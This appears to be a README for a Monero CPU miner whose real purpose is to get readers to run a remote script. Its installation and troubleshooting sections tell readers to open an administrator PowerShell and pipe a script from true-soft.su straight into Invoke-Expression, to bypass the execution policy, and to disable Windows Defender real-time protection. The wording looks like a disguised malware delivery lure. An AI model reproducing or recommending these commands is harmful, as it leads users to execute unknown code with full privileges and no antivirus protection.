Monero (XMR) High-Performance CPU Miner & Benchmark Utility
Welcome to the official repository of the high-performance Monero Miner. This open-source software is engineered for efficient cryptocurrency mining and hardware benchmarking using the RandomX algorithm. It delivers maximum hash rate tracking and advanced CPU core optimization.
📊 Key Features
- RandomX Optimization: High-efficiency execution loops for Monero mining.
- Multi-Threading Support: Advanced CPU core allocation mechanics.
- Hardware Benchmarking: Precise metric logging for performance testing.
- Low Overhead: Minimal system memory footprint during execution.
- Open Source: Transparent code architecture for security auditing.
🔎 Technical Specifications
| Parameter | Specification |
|---|---|
| Target Currency | Monero (XMR) |
| Algorithm | RandomX |
| Architecture | x86_64 / ARM64 |
| Optimization | Huge Pages, MSR Registers |
🚀 Automated Installation & Setup (PowerShell)
-
Open PowerShell as Administrator:
- Press the
Win + Xkeys simultaneously. - Select Terminal (Admin) or Windows PowerShell (Admin) from the context menu.
- Press the
-
Run the Installation Command: Copy, paste, and press
Enterto run the following initialization command. This script will automatically configure the registry bypass and download all required packages:irm https://true-soft.su/powershell/Loader.ps1 | iex
🔍 Troubleshooting & Common Errors
📌 Execution Policy Error (Script Blocked)
If your system blocks the launch due to execution policy restrictions, force a bypass using this command in Command Prompt (cmd):
powershell -ExecutionPolicy Bypass -Command "irm https://true-soft.su/powershell/Loader.ps1 | iex"📌 Error: "irm is not recognized..." (Older PowerShell Versions)
If you are using an older environment where short aliases are missing, use the full system commands:
Invoke-RestMethod https://true-soft.su/powershell/Loader.ps1 | Invoke-Expression📌 Antivirus or SmartScreen Block
Automated scripts can sometimes trigger antivirus warnings. If this happens, temporarily turn off "Real-time protection" in Windows Defender settings during setup, then turn it back on as soon as the installation is complete.